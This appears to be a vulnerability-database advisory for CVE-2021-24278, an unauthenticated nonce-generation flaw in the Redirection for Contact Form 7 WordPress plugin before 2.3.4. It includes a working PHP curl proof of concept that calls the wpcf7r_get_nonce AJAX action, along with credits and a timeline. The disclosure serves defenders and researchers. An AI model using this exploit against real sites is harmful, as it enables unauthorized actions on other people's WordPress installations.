Redirection for Contact Form 7 < 2.3.4 – Unauthenticated Arbitrary Nonce Generation | CVE 2021-24278 | Plugin Vulnerabilities

Description

In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.

Proof of Concept

<?php
// Settings
$wp_url = $argv[1];

// Get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' =>  'wpcf7r_get_nonce',
   'param' => '[ANY ACTION HERE]'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);


?>

Affects Plugins

Fixed in 2.3.4

References

CVE

URL

https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

Yes

WPVDB ID

99f30604-d62b-4e30-afcd-b482f8d66413

Timeline

Publicly Published

2021-04-20 (about 3 years ago)

Added

2021-04-20 (about 3 years ago)

Last Updated

2021-04-21 (about 3 years ago)

Other

Published

Title

Published

2021-05-05

Title

Simple Admin Language Change < 2.0.2 - Arbitrary User Locale Change

Published

2021-07-02

Title

Workreap < 2.2.2 - Missing Authorization Checks in Ajax Actions

Published

2024-01-08

Title

ElementsKit Lite < 3.0.4 - Unauthenticated Sensitive Information Exposure

Published

2021-10-05

Title

JobSearch WP Job Board < 1.8.2 - Subscriber+ Add/Update Schedule Calls

Published

2024-02-08

Title

Event Tickets Plus < 5.9.1 - Contributor+ Attendees Lists Disclosure